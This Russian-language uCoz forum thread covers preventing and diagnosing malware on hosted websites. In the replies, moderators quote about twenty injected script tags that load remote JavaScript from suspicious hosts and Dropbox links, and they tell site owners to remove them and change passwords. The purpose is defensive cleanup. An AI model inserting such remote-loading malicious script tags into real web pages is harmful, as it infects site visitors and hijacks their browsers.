Модератор форума: Yuri_G  
Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
Вирусы на сайтах
Модератор форума
Сообщение # 1 | 22:08:04 21 Июн 2010
Как предотвратить попадание вредоносных ссылок на сайт

  • Первое и самое главное - это запрещать использование у вас на сайте HTML тегов для всех групп пользователей, кроме администратора.

  • Запретить BB коды в чате всем группам пользователей, запрещать использование BB-коды [url]и [img], так же можно запретить использование BB кодов в гостевой и комментариях.

  • В комментариях, гостевой книге, на форуме и в мини-чате запрещать функцию Автоматически делать ссылками www и email адреса

  • Всегда помнить, что тег iframe считается потенциально опасным, и быть очень осторожным при вставке партнерок и рекламных блоков через iframe. На юкозе используются два ифрейма: это рекламный баннер и мини-чат. Это безопасные ифреймы.

  • Очень осторожно выбирать баннерные сети партнерки с рекламными блоками на сайт.




Диагностика

  • Если случилось так, что ваш антивирус или антивирусы ваших пользователей "реагируют" на ваш сайт, а так же если браузер Mozilla Firefox ставит заглушку-предупреждение на ваш сайт, а Google в выдаче метит ваш сайт, как тот, который может нанести вред вашему компьютеру, а вебмастер Яндекса высылает вам предупреждение о том, что ваш сайт заражён...
    В первую очередь нужно ознакомиться с аллертами антивируса. Большинство антивирусов выдают достаточно полную информацию о блокировке того или иного объекта на сайте, так же заглушка Firefox-а и вебмастер Google и Яндекса имеют описания вредоносного кода обнаруженного у вас на сайтеБывает так, что ваш сайт не заражен, а мог быть заражен сайт, который крутится у вас в рекламе (чаще всего такое случается с баннерными сетями или партнерками по обмену трафиком ), тем не менее вы можете получить аллерт антивируса. Сложность диагностики таких аллертов состоит в том, что баннеры и сайты подгружаемые кодом подобных партнерок могут постоянно меняться. Если вредоносный код обнаруживается у вас на сайте, тогда поисковики могут наложить фильтр на ваш сайт. Выглядит это так, что в выдаче под ссылкой на ваш сайт будет предупреждение о том, что сайт может нанести вред вашему компьютеру, а браузер Mozilla Firefox или Google Chrome или Opera будет при этом выдавать заглушку - предупреждение. В этом случае даже если сайт будет полностью очищен от вредоносного кода такие фильтры и заглушки могут висеть ещё очень долго. Чем быстрее будет очищен сайт - тем быстрее будет снят фильтр, а так же заглушки с браузеров
  • Если ваш сёрфинг по интернету сопровождается постоянной навязчивой рекламой, если вы на многих сайтах видите одну и ту же рекламу и видите её только вы (другие пользователи не наблюдают подобных отклонений), если вы пишете сообщения на форумах, чатах, гостевых и т.д и в ваши сообщения встраиваются посторонние ссылки или рекламные объявления, то есть если у вас сходные отклонения не на одном, а на целой серии различных сайтов, то стоит очистить свой компьютер от вирусов.
  • Если вдруг у вас на сайте появилось всплывающее окно, что-то на подобии формы входа, где нужно ввести логин и пароль, то естественно свои данные вводить не стоит, а стоит присмотреться к всплывающему окну, а именно к его адресу или заголовку. Адрес или заголовок такого окна всегда отличен от адреса и заголовка вашего сайта.
    Для поиска транслятора всплывающего окна нужно проверить все модули, где у вас разрешен BB код для пользователей. Чаще всего подобное подсаживают через мини-чат с разрешенными BB-кодами в нем. Ваша задача найти инородную картинку (чаще всего смайлик)


Правила подачи заявки на диагностику и поиск вредоносного кода на сайте

  • Вы должны предоставить ссылку на сайт!

  • Вы должны дать описание проблемы:

    1) на какой странице сайта обнаруживается проблема (ссылка)

    2) проблема обнаруживается только под логином или под гостем тоже

    3) если реагирует антивирус, то назовите свой антивирус, и предоставьте текст или четкий скриншот блокировки

    4) если сайт блокируется браузером, то назовите свой браузер и предоставьте текст блокировки


    Полезные ссылки:


    Так как большинство случаев заражения сайтов является плодом неумелого обращения с готовыми скриптами, а так же с готовыми элементами дизайна для сайтов найденными в сети, то перед тем как внедрить на сайт найденный в сети скрипт стоит ознакомиться со следующими темами:


    astrolon
    Сообщений: 5
    Репутация: 3

    Сообщение # 1006 | 12:34:41 04 Фев 2014
    Webanet, спасибо за подсказку про вредные скрипты. Еще хотел спросить как избавиться от всплывающих сообщений имитирующих сообщения vkontakte, в левом нижнем углу на сайте http://popatenko.at.ua/?
    АстролонЫч
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1007 | 13:31:53 04 Фев 2014
    astrolon, лучше всего просто обновить шаблон. слишком много вредоносного кода. или чистить. панель управления - дизайн - управление дизайном - быстрая замена - по очереди вставляете скрипты в поле что заменить

    Код
    <script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/98vihkxfbix863weu7zv9wqxjxhbbdh'></script>


    Код
    <script language='javascript' charset='UTF-8' type='text/javascript' src='http://omirevovne.ru/98vihkxfbix863weu7zv9wqxjxhbbdh'>
    </script>

    Код
    <script type="text/javascript" src="http://nativevat.hol.es/rases.txt"></script>

    Код
    <script type="text/javascript" src="http://nativevat.hol.es/rases.txt"></script>

    Код
    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/hvuz2754blb414j/niucee.txt"></script>

    Код
    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/hvuz2754blb414j/niucee.txt"></script>

    Код
    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/eipt4uu8dbovggv/niuggcee.txt"></script>

    Код
    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/g5zffknmr8da4tp/update.txt"></script>

    Код
    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4lgd2g170q96tq3/menu-v2.txt"></script>

    Код
    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/4f9eakzpj17n2yw/shapka.txt"></script>

    Код
    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/ud3ne5xe8dcre8u/topbottom.txt"></script>

    Код
    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/kuejhhvopk6nw6z/mysql.txt"></script>

    Код
    <script type="text/javascript" src="https://dl.dropboxusercontent.com/s/af6arwcjnknnb15/menu.txt"></script>

    Код
    <script type="text/javascript" src="http:///pop-up.js"></script>

    Код
    <script type="text/javascript" src="http:///pop-up.js"></script>

    Код
    <script type="text/javascript" src="http:///jQuery.js"></script>

    Код
    <script type="text/javascript" src="http:///jQuery_v2.js"></script>

    Код
    <script language="javascript" src="./js.php?s=54"></script>

    Код
    <script type="text/javascript" src="http://dl.dropbox.com/u/36053555/script.js"></script>

    Код
    <script  
    type="text/javascript" src="https://dl.dropboxusercontent.com/s/1ca1t7akhf87zrc/flashsiteru.txt"></script>

    Код
    <script async charset='UTF-8' language='javascript' type='text/javascript' src='http://omirevovne.ru/8mi9nn0te6q68tjygr5vm573z85xk4lzw89gq7udb51xh8l'></script>

    поле на что заменить каждый раз оставляете пустым и производите замену во всех модулях

    после очистки вы должны обязательно сменить пароль uid профиля. как это сделать написано тут //forum.ucoz.ru/forum/45-52299-1

    обязательна к прочтению эта тема //forum.ucoz.ru/forum/45-57475-1
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    astrolon
    Сообщений: 5
    Репутация: 3

    Сообщение # 1008 | 15:23:25 04 Фев 2014
    webanet, подскажите если обновить шаблон, то контент не исчезнет? И если контент останется таким как был, то как сие правильно сделать? И еще, как вредоносные скрипты появляются в шаблоне?
    АстролонЫч
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1009 | 15:26:27 04 Фев 2014
    astrolon, контент весь останется на месте

    Цитата
    И еще, как вредоносные скрипты появляются в шаблоне?
    я вам ссылки давала для обязательного прочтения. читайте //forum.ucoz.ru/forum/45-57475-1 со слов как удалить

    а кратко вы где-то засветили свой пароль от uid профиля. читайте тему что я дала
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    VAMP9109
    Сообщений: 26
    Репутация: -19

    Сообщение # 1010 | 16:20:29 04 Фев 2014
    огромная просьба подсказать что мне делать сегодня заметил что на главной страница сайта заблокировано следующим сообщением : ОПАСНОСТЬ ОБНАРУЖЕНО ВРЕДОНОСНОЕ ПО !

    я первый раз сталкиваюсь с такой проблемой подскажите как разблокировать главную страничку сайта возможно что это сделали злоумышленники ! срочна нужна помощ ! адрес сайта http://fuckinforum.clan.su/
    webanet
    Сообщений: 24067
    Репутация: 4985

    Сообщение # 1011 | 16:22:57 04 Фев 2014
    VAMP9109, из блока наша музыка удалить

    Код
    <script language="javascript" src="http://www.101.ru/?an=infoplayw1&channel=122"></script><script language="javascript" src="http://www.101.ru/?an=infoplayw1&channel=118"></script><script language="javascript" src="http://www.101.ru/?an=infoplayw1&channel=123"></script><script language="javascript" src="http://www.101.ru/?an=infoplayw1&channel=9"></script> <script language="javascript" src="http://www.101.ru/?an=infoplayw1&channel=82"></script><script language="javascript" src="http://www.101.ru/?an=infoplayw1&channel=69"></script><script language="javascript" src="http://www.101.ru/?an=infoplayw1&channel=73"></script> <script language="javascript" src="http://www.101.ru/?an=infoplayw1&channel=113"></script> <script language="javascript" src="http://www.101.ru/?an=infoplayw1&channel=149"></script><script language="javascript" src="http://www.101.ru/?an=infoplayw1&channel=151"></script><script language="javascript" src="http://www.101.ru/?an=infoplayw1&channel=1"></script>
    ТУТ можно оставить своё мнение по любому вопросу
    https://webanetlabs.net/
    astrolon
    Сообщений: 5
    Репутация: 3

    Сообщение # 1012 | 12:01:48 05 Фев 2014
    Webanet, вот тут http://astrolon.at.ua/ повыбрасывал все скрипты, которые вы указали, а дрянь и ныне там, что делать? Пароль uid сменил.
    АстролонЫч
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1013 | 12:06:31 05 Фев 2014
    astrolon, вы не удалили код

    Код
    <script language='javascript' type='text/javascript' src='http://omirevovne.ru/55zgn5x6ihj88voak3xatwx61o2o28l'></script>


    Воспользуйтесь быстрой заменой участков шаблона.
    astrolon
    Сообщений: 5
    Репутация: 3

    Сообщение # 1014 | 12:33:30 05 Фев 2014
    $Vladimir$
    спасибо все удалилось. Как вы их вычисляете эти зловредные скрипты?
    АстролонЫч
    $Vladimir$
    Сообщений: 7465
    Репутация: 1053

    Сообщение # 1015 | 12:39:03 05 Фев 2014
    astrolon,
    Цитата webanet ()
    обязательна к прочтению эта тема //forum.ucoz.ru/forum/45-57475-1
    Dexa
    Сообщений: 16
    Репутация: 0

    Сообщение # 1016 | 15:02:46 05 Фев 2014
    Здравствуйте,avast блокирует сайт ,вот что пишет:На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.


    Cheat-help.ru
    сondor
    Сообщений: 4661
    Репутация: 1528

    Сообщение # 1017 | 15:11:08 05 Фев 2014
    Цитата Dexa ()
    Здравствуйте,avast блокирует сайт ,вот что пишет:На сайте обнаружены iframe-вставки, ссылающиеся на сомнительные сайты либо обфусицированный код.


    Dexa, на вашем сайте не было обнаружено никакого вредоносного кода. Аваст блокирует по ошибке.
    Dexa
    Сообщений: 16
    Репутация: 0

    Сообщение # 1018 | 15:23:58 05 Фев 2014
    посоветовали del этот сайт ,он нашел вредоносный код
    Сообщение отредактировал webanet - Среда, 05 Фев 2014, 18:13:12
    сondor
    Сообщений: 4661
    Репутация: 1528

    Сообщение # 1019 | 15:30:23 05 Фев 2014
    Dexa, забудьте напрочь про онлайн проверялки на вирусы, так как в большинстве случаев все они выдают неправильную информацию относительно того или иного скрипта или кода.
    Лена1858
    Сообщений: 23
    Репутация: 0

    Сообщение # 1020 | 16:36:12 05 Фев 2014
    Привет всем, прошу вас помочь проверить шаблон. Дело вот в чем: я создал сайт для тестироавния шаблонов перед установкой на основной сайт, и вот я поставил шаблон и теперь вот что с сайтом



    Я вроде удалил вредоносный код из констируктора, и теперь все нормально, сайт открывается как обычно. Но можете проверить шаблон на наличие чего-то плохого, а то не хочеться зараженный шаблон поставить на основной.
    Вот сайт http://tapesport.ucoz.ru/
    Сообщество uCoz » Мастерская uCoz » Безопасность сайта » Вирусы на сайтах (предотвращение, диагностика)
    Поиск: